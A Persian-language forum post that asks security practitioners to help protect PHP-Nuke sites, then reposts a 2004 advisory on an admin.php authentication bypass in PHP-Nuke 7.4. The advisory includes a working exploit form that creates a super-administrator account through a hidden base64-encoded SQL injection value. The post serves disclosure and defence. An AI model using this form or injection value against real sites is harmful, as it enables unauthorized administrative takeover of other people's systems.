شايد تا كنون تاپيكهاي بسياري در اين زمينه باز شده باشد ولي اينبار مي خواهم از كليه دوستاني كه در زمينه امنيت كار مي كنند خواهش كنم اطلاعات خودشان را در اين تاپيك مطرح كنند تا بنوعي سايتهاي مبتني بر ناك بتوانند خود را در برابر حملات هكرها محافظت نمايند.
امروز دوست عزيزي اين حفره را گزارش داد كه متن كامل آن را در زير مي بينيد:
امروز دوست عزيزي اين حفره را گزارش داد كه متن كامل آن را در زير مي بينيد:
کد:
PHP-Nuke Authentication Flaw in 'admin.php' Lets Remote Users Gain Administrative Privileges
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Sep 5 2004
Impact: Modification of user information, User access via network
Exploit Included: Yes
Version(s): 7.4
Description: An authentication vulnerability was reported in PHP-Nuke in the 'admin.php' script. A remote user can create a user account that has administrative privileges.
CODEBUG Labs reported that a remote user can submit a specially crafted POST request to 'admin.php' to add a user account and grant administrative privileges to that user account.
A demonstration exploit HTTP form is provided:
<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
The original advisory is available at:
http://www.mantralab.org/modules.php/modulo/news/lanotizia/%5BXSS%5D+Remote+privilege+escalation+in+PHP-Nuke+7.4
Impact: A remote user can add an administrative account to gain administrative access to PHP-Nuke on the target system.
Solution: No solution was available at the time of this entry.
Vendor URL: [url]www.phpnuke.org/[/url] (Links to External Site)
Cause: Authentication error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Pierquinto Manco <[email protected]>
Message History: None.